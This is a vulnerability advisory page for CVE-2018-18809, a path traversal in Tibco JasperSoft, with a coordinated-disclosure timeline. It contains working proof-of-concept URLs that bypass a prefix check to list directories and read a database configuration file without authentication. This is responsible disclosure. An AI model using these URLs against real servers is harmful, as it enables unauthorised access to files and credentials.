Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Tibco JasperSoft Path Traversal

Related Vulnerabilities: CVE-2018-18809   cve-2018-18809  
Publish Date: 09 Sep 2019
Author: Elar Lang
Source 
                							

                Title: CVE-2018-18809 Path traversal in Tibco JasperSoft
Credit: Elar Lang / https://security.elarlang.eu
Vendor/Product: Tibco JasperSoft (https://www.jaspersoft.com/)
Vulnerability: Path traversal
CVE: CVE-2018-18809

# Path traversal
Vulnerability is in reportresource/reportresource/ service and in resource
parameter. There is "defence" - value for resource param must start with
net/sf/jasperreports/.

Available for remote not authenticated users.

## Proof-of-Concept
Reading file listing:
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../

Reading file content (js.jdbc.properties as an example):
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties

# List of Systems Affected, Related fixes and releases:
"TIBCO Security Advisory: March 6, 2019 - TIBCO JasperReports Library -
2018-18809"
https://www.tibco.com/support/advisories/2019/03/tibco-security-advisory-march-6-2019-tibco-jasperreports-library-2018-18809


# Vulnerability Disclosure Timeline

2018-10-15 | me > Tibco | Notification to security@tibco.com
2018-10-15 | Tibco > me | Thanks for PoC

2018-10-29 | me > Tibco | How is going? No fixes even for their own site.
2018-10-15 | Tibco > me | Explanation of policy that they threat everyone
equally and as no fix available for their customer, they can not fix their
own site also.

2019-01-11 | Tibco > me | Issue is still under investigation. Issue
discovery credits and publishing details coordination for future.
2019-01-11 | me > Tibco | Response, agreement with credits.

2019-03-06 | Tibco > me | "We published security advisories"
2019-03-06 | Tibco | "TIBCO Security Advisory: March 6, 2019 - TIBCO
JasperReports Library - 2018-18809"

2019-04-21 | me > Tibco | I'm going to write Full Disclosure, but your own
demo site is still vulnerable.
..
2019-04-26 | Tibco > me | Demo site fixed/updated now.

2019-09-07 | me | Full Disclosure on https://security.elarlang.eu

# More detailed description is available in blog:
https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html

--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com


<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started